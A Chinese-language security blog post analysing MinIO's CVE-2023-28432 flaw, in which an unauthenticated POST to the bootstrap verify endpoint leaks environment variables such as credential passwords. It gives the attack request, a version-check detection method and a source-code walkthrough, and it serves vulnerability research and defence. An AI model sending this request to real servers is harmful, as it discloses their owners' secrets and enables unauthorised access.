MinIO verify 接口敏感信息泄露漏洞分析(CVE-2023-28432)

admin 2024年11月15日10:19:51MinIO verify 接口敏感信息泄露漏洞分析(CVE-2023-28432)已关闭评论17 views字数 1199阅读3分59秒阅读模式

MinIO verify 接口敏感信息泄露漏洞

简介

漏洞描述: MinIO 是一种开源的对象存储服务,它兼容 Amazon S3 API,可以在私有云或公有云中使用。MinIO 是一种高性能、高可用性的分布式存储系统,它可以存储大量数据,并提供对数据的高速读写能力。MinIO 采用分布式架构,可以在多个节点上运行,从而实现数据的分布式存储和处理。

影响范围: MinIO verify接口存在敏感信息泄漏漏洞,攻击者通过构造特殊URL地址,读取系统敏感信息。

漏洞攻击载荷

POST /minio/bootstrap/v1/verify HTTP/1.1
  • 1

漏洞检测方法

HTTP请求:

GET /api/v1/check-version
  • 1

HTTP响应:

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Date: Fri, 24 Mar 2023 06:26:01 GMT
Server: MinIO Console
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Xss-Protection: 1; mode=block
Content-Length: 69

{
    "latest_version": "minio/minio:RELEASE.2023-03-22T06-36-24Z"
}
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14

当latest_version的value<RELEASE.2023-03-20T20-16-18Z,则存在漏洞。

漏洞代码分析

首先根据攻击载荷,咱们看到在调用bootstrap。根据main.go中的加载模块得知代码逻辑在minio/cmd中。
MinIO verify 接口敏感信息泄露漏洞分析(CVE-2023-28432)
紧接着通过查看应用路由得知,存在漏洞的文件为bootstrap-peer-server.go。
MinIO verify 接口敏感信息泄露漏洞分析(CVE-2023-28432)
在文件中找到哪里能接受HTTP请求,接受HTTP请求的方法只有两个,
分别在Line130与Line132。
MinIO verify 接口敏感信息泄露漏洞分析(CVE-2023-28432)
通过攻击载荷之中的verify得知,我们入口在Line132。咱们看下程序在入口做了什么?
Line133,代码新建上下文对象,用于传递HTTP请求和响应。
Line135,用于输出错误日志。
Line134作为则是获取服务器系统配置。

接下来,需要查看getServerSystemCfg()做了些什么。在getServerSystemCfg()方法中获取了环境变量,其中envValues采用遍历的方式获取了skipEnvs[envK]的value。
MinIO verify 接口敏感信息泄露漏洞分析(CVE-2023-28432)
skipEnvs中包含什么?其中包含MINIO_CERT_PASSWD等敏感信息
MinIO verify 接口敏感信息泄露漏洞分析(CVE-2023-28432)

MINIO_CERT_PASSWD的值来源于buildscripts\upgrade-tests\minio.env,minio.env之中明文存储着账号密码信息。
MinIO verify 接口敏感信息泄露漏洞分析(CVE-2023-28432)
最终由于在逻辑上无认证,导致了未授权访问漏洞。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月15日10:19:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MinIO verify 接口敏感信息泄露漏洞分析(CVE-2023-28432)https://cn-sec.com/archives/3396306.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.